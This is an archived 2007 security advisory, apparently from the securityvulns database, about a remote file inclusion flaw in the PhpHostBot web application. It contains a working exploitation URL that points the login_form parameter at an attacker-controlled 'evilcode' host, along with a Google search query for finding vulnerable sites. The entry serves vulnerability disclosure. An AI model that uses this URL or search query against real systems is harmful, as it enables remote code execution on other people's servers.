SolpotCrew Advisory #14 (S4M3K) - PhpHostBot (login_form) Remote File Inclusion

2007-07-27T00:00:00
ID SECURITYVULNS:DOC:17621
Type securityvulns
Reporter Securityvulns
Modified 2007-07-27T00:00:00

Description

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + PhpHostBot (login_form) Remote File Inclusion + + Download link : http://www.idevspot.com/PhpHostBot.php + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + Bug Found By :S4M3K (24-07-2007) + + contact: x_spy@mac.com + + Website : http://www.m3ks.org/adv/m3ks-adv-24.7.07.txt + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + Greetz: Scr3W_W0rM, Nyubi, Home_edition2001, Dj-RuFfy, TOMMY_PENGAMEN, th0nk, + iFX, Cookie, VanDaMe, Dead + & All member on #nyubicrew @irc.mildnet.org + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + Exploitation: + + http://[target]/[path]/library/authorize.php?login_form=http://evilcode? + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + google dork : "PhpHostBot" ; inurl:"PhpHostBot" + + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++